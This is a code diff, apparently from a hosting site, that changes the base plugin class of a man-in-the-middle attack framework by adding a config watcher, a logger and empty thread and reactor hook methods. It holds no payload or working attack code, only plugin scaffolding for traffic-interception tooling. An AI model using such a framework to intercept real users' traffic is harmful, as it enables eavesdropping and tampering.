||||
|
||||
|
|
|
@ -2,9 +2,12 @@
|
|||
The base plugin class. This shows the various methods that
|
||||
can get called during the MITM attack.
|
||||
'''
|
||||
from core.configwatcher import ConfigWatcher
|
||||
import logging
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class Plugin(object):
|
||||
class Plugin(ConfigWatcher, object):
|
||||
name = "Generic plugin"
|
||||
optname = "generic"
|
||||
desc = ""
|
||||
|
@ -15,6 +18,10 @@ class Plugin(object):
|
|||
'''Called if plugin is enabled, passed the options namespace'''
|
||||
self.options = options
|
||||
|
||||
def startThread(self, options):
|
||||
'''Anything that will subclass this function will be a thread'''
|
||||
return
|
||||
|
||||
def add_options(options):
|
||||
'''Add your options to the options parser'''
|
||||
raise NotImplementedError
|
||||
|
@ -27,6 +34,10 @@ class Plugin(object):
|
|||
'''Handles outgoing request'''
|
||||
raise NotImplementedError
|
||||
|
||||
def pluginReactor(self, strippingFactory):
|
||||
'''This sets up another instance of the reactor on a diffrent port'''
|
||||
pass
|
||||
|
||||
def handleResponse(self, request, data):
|
||||
'''
|
||||
Handles all non-image responses by default. See Upsidedownternet
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue